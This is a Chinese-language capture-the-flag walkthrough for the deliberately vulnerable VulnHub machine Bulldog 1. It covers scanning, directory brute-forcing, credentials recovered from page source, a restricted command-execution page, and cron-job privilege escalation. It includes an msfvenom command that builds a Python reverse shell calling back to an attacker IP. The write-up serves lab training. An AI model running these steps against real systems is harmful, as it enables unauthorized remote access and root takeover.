介绍
系列:Bulldog(此系列共2台)
发布日期:2017 年 8 月 28 日
难度:中级
运行环境:Virtualbox
目标:取得 root 权限
学习:
- 目录爆破
- 密码破解
- bash反弹shell
- Python文件提权
- 计划任务提权
靶机地址:https://www.vulnhub.com/entry/bulldog-1,211/
信息收集
主机发现
netdiscover主机发现
sudo netdiscover -i eth1 -r 192.168.56.0/24
主机信息探测
nmap -p- 192.168.56.106
nmap -p 23,80,8080 -A 192.168.56.106
网站探测
网站首页就是一个静态页面,页面源代码中没有任何有价值的信息,直接目录爆破
目录爆破
dirsearch -u http://192.168.56.106/ --full-url -x 404
爆破出一个后台地址,还有一个dev地址,访问 http://192.168.56.106/dev/
查看页面源代码发现了一些密码
使用在线网站解密:
得到两组账密:
nick:bulldog
sarah:bulldoglover
命令执行
登录后台:http://192.168.56.106/admin/
然后就可以访问到:http://192.168.56.106/dev/shell/
看起来是命令执行漏洞,但是限制了能使用的命令
看到运行的命令里有echo
,应该可以借助bash
实现反弹shell
计划任务提权
这里发现了一个敏感文件,查找发现这个敏感文件是crontab 定时任务,任务的执行计划为每分钟执行一次,命令为 /.hiddenAVDirectory/AVApplication.py
,由 root 用户执行。
接下来的可以参考之前的操作:https://www.yuque.com/u1881995/xwfvho/spl1fgit20302ozi#nTG0d
# 搜索属于root的所有文件。文件所有者是root、文件具有可执行权限、其他用户具有可写权限 的所有文件
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
# 在根目录以递归方式查找文件名中包含 AVApplication.py 的所有文件,并输出文件名及相应行号
grep -rnw '/' -e 'AVApplication.py' 2> /dev/null
- 生成python反弹shell的命令,并将其写入到py文件中
msfvenom -p cmd/unix/reverse_python lhost=192.168.229.128 lport=4455 -f raw
这里使用vi编辑器打开py文件,写入上面生成的反弹shell的命令。这是会出现错乱问题,不用管
- 最多等待1分钟,就会拿到shell